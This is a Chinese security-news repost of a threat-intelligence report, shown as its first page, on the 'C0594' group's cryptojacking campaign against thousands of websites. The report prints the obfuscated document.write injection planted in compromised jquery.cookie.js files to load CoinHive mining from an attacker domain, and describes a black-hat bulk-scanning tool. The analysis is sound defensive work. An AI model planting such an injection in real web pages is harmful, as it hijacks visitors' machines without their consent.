欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

C0594组织恶意挖矿攻击,已攻陷数千个网站

来源:本站整理 作者:佚名 时间:2018-04-11 TAG: 我要投稿

0×1 概况
腾讯御见威胁情报中心近期监测发现,包括传统企业、互联网公司、学校和政府机构等在内的多个网站网页被植入挖矿JS脚本。经分析,该批站点中的核心JS文件被注入恶意代码,通过请求同一个脚本文件(http(:)//a.c0594.com/?e=5),加载另一个脚本文件(http(:)//a.c0594.com/?js=1)提供的CoinHive挖矿代码,从而在用户机器上执行挖矿。


与以往直接在网页源码插入CoinHive挖矿代码不同,此次发现的挖矿行为通过动态加载JS文件,在不同网页中插入同样的恶意代码,并且统计收益的Site Key也相同,可以推测是同一个组织进行的一次有组织的攻击。由于该段挖矿代码来源于a.c0594.com,我们暂且将其称为C0594组织恶意挖矿事件。

0×2 事件分析
以该批站点中的bayimg.co网站为例,分析如下:
从bayimg.co网站源码,可看到JS:jquery.cookie.js被注入了恶意代码:
document.write('script src=http://a'+'.c059'+'4.com/?e=5>script>')

hxxp://a.c0594.com/?e=5同时会调用hxxp://a.c0594.com/?js=1

从而链接到CoinHive挖矿平台,执行挖矿操作。

挖矿收益最终归属为Coinhive.com对应Site Key: 99nheD84S8eJK7eD4pufvR5Wd1KGjxlj
在whorunscoinhive.com查询该Site Key挖矿的网页月流量达1011442,排在网页挖矿top榜第56位:

0×3 木马溯源
通过搜索引擎,可看到该组织早在2014年就开始对大量网站进行攻击:


使用腾讯御见威胁情报平台对a.c0594.com进行反查,发现该域名曾解析到ip 62.210.181.55和47.89.176.191

继续反查这两个ip,发现其下存在较多xxx.c0594.com以及xxx.094n.com的域名。


其中域名member.094n.com引起了我们的注意。

该平台提供webshell列表、WordPress漏洞列表、网站注入点管理等功能。在产品更新记录中还可以看到对struct漏洞攻击、SQLMAP注入攻击等的更新记录。

从网站下载最新的软件得到一款名为Black Spider的黑帽辅助软件。

该软件可以批量检测网站的漏洞,提供功能包括:自动爬取Getshell、自动扫描注入点、自动文件探测、旁站C段扫描、漏洞扫描、CMS安全检测、批量检测注入等。

软件的CMS.txt文件记录了支持检测的一百多种建站系统漏洞,包括学校建站系统、企业建站系统、文章管理等建站系统的漏洞。

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载